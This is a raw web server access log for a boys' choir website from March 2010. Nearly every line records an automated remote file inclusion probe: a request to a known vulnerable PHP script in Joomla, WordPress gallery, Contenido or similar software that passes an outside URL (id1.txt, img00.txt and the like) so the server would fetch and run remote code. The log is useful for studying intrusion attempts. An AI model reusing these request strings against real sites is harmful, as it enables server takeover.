78.110.50.120 - - [09/Mar/2010:04:02:37 -0800] "GET /logs/access_100205.log%20%20//nologa/board/delete_all.php?board_skin_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:04:02:37 -0800] "GET /nologa/board/delete_all.php?board_skin_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:04:02:37 -0800] "GET /logs//nologa/board/delete_all.php?board_skin_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:04:02:55 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:04:02:55 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:04:02:55 -0800] "GET /logs/access_091111.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:04:03:00 -0800] "GET /logs/access_100205.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:04:03:10 -0800] "GET /logs/access_100210.log%20%20//nologa/board/delete_all.php?board_skin_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:03:49 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:03:49 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:03:49 -0800] "GET /logs/access_100210.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:03:50 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:03:51 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:03:52 -0800] "GET /logs/access_100210.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:04:05:16 -0800] "GET /logs/access_091111.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:04:05:19 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.150.205.155 - - [09/Mar/2010:04:05:24 -0800] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.americanboyschoir.com"
219.150.205.156 - - [09/Mar/2010:04:05:28 -0800] "GET /logs/access_100213.log//errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.americanboyschoir.com"
219.150.205.156 - - [09/Mar/2010:04:05:28 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:04 -0800] "GET /logs/access_091213.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:04 -0800] "GET /logs/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:04 -0800] "GET /errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:20 -0800] "GET /logs/access_091213.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:21 -0800] "GET /errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:21 -0800] "GET /logs/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:25 -0800] "GET /logs/access_091213.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:25 -0800] "GET /errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:25 -0800] "GET /logs/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:26 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:41 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:06:42 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:07:34 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:07:34 -0800] "GET /logs/access_100210.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:07:35 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:07:36 -0800] "GET /logs/access_100210.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:07:36 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:07:37 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.17.201.144 - - [09/Mar/2010:04:07:44 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.17.201.144 - - [09/Mar/2010:04:07:44 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.17.201.144 - - [09/Mar/2010:04:07:44 -0800] "GET /logs/access_091111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:04:07:45 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:04:07:45 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:04:07:46 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.32.68.153 - - [09/Mar/2010:04:08:06 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.32.68.153 - - [09/Mar/2010:04:08:06 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.32.68.153 - - [09/Mar/2010:04:08:06 -0800] "GET /logs/access_091111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:04:09:40 -0800] "GET /logs/access_100228.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:10:49 -0800] "GET /logs/access_100130.log%20%20/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:10:49 -0800] "GET /logs/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:10:49 -0800] "GET /errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:11:34 -0800] "GET /logs/access_091213.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:11:34 -0800] "GET /logs/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:11:34 -0800] "GET /errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:12:07 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:12:48 -0800] "GET /logs/access_100210.log%20%20/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:14:07 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:14:08 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:14:09 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:16:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:16:45 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:16:45 -0800] "GET /logs/access_091029.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:17:16 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:18:26 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:18:52 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:18:52 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:18:52 -0800] "GET /logs/access_091213.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:18:53 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:18:53 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:18:53 -0800] "GET /logs/access_091213.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:19:07 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:19:07 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:19:07 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:19:07 -0800] "GET /logs/access_091213.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:19:14 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:19:23 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:19:42 -0800] "GET /logs/access_100209.log%20%20//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:19:42 -0800] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:19:42 -0800] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:19:49 -0800] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:19:49 -0800] "GET /logs/access_100209.log%20%20//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:19:49 -0800] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:19:53 -0800] "GET /logs/access_091229.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:19:55 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:19:55 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:19:57 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:19:57 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:19:57 -0800] "GET /logs/access_091029.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:04:20:15 -0800] "GET /logs/access_100205.log//nologa/board/delete_all.php?board_skin_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:20:25 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:04:21:06 -0800] "GET /logs/access_100210.log//nologa/board/delete_all.php?board_skin_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:22:20 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/yes.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
209.217.76.244 - - [09/Mar/2010:04:26:41 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://achome.co.uk/internationalac/test.txt?? HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.americanboyschoir.com"
209.217.76.244 - - [09/Mar/2010:04:26:41 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://achome.co.uk/internationalac/test.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:26:43 -0800] "GET /logs/access_091229.log%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:26:43 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:26:43 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:26:56 -0800] "GET /logs/access_091213.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:27:07 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:27:28 -0800] "GET /logs/access_091213.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:27:33 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:27:43 -0800] "GET /logs/access_100117.log%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:27:44 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:27:44 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:27:44 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:27:47 -0800] "GET /logs/access_100213.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:28:12 -0800] "GET /logs/access_100209.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:04:28:14 -0800] "GET /logs/access_100213.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:04:28:33 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:04:28:33 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:04:28:35 -0800] "GET /logs/access_091213.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
